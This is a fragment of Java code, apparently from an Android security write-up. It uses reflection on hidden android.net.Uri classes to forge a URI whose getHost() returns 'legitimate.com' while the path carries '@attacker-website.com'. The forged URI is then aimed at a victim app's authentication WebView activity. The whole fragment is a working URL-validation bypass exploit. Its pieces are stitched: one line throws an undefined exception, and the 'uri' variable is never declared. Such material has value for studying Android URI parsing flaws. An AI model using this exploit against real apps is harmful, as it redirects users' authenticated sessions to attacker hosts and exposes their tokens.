Class partClass = Class.forName("android.net.Uri$Part");
Constructor partConstructor = partClass.getDeclaredConstructors()[0];
partConstructor.setAccessible(true);
Class pathPartClass = Class.forName("android.net.Uri$PathPart");
Constructor pathPartConstructor = pathPartClass.getDeclaredConstructors()[0];
pathPartConstructor.setAccessible(true);
Class hierarchicalUriClass = Class.forName("android.net.Uri$HierarchicalUri");
Constructor hierarchicalUriConstructor = hierarchicalUriClass.getDeclaredConstructors()[0];
hierarchicalUriConstructor.setAccessible(true);
Object authority = partConstructor.newInstance("legitimate.com", "legitimate.com");
Object path = pathPartConstructor.newInstance("@attacker-website.com", "@attacker-website.com");
uri = (Uri) hierarchicalUriConstructor.newInstance("https", authority, path, null, null);
// uri.getScheme() == https
// uri.getUserInfo() == null
// uri.getHost() == legitimate.com
throw new RuntimeException(e);
Intent intent = new Intent();
intent.setClassName("com.victim", "com.victim.AuthWebViewActivity");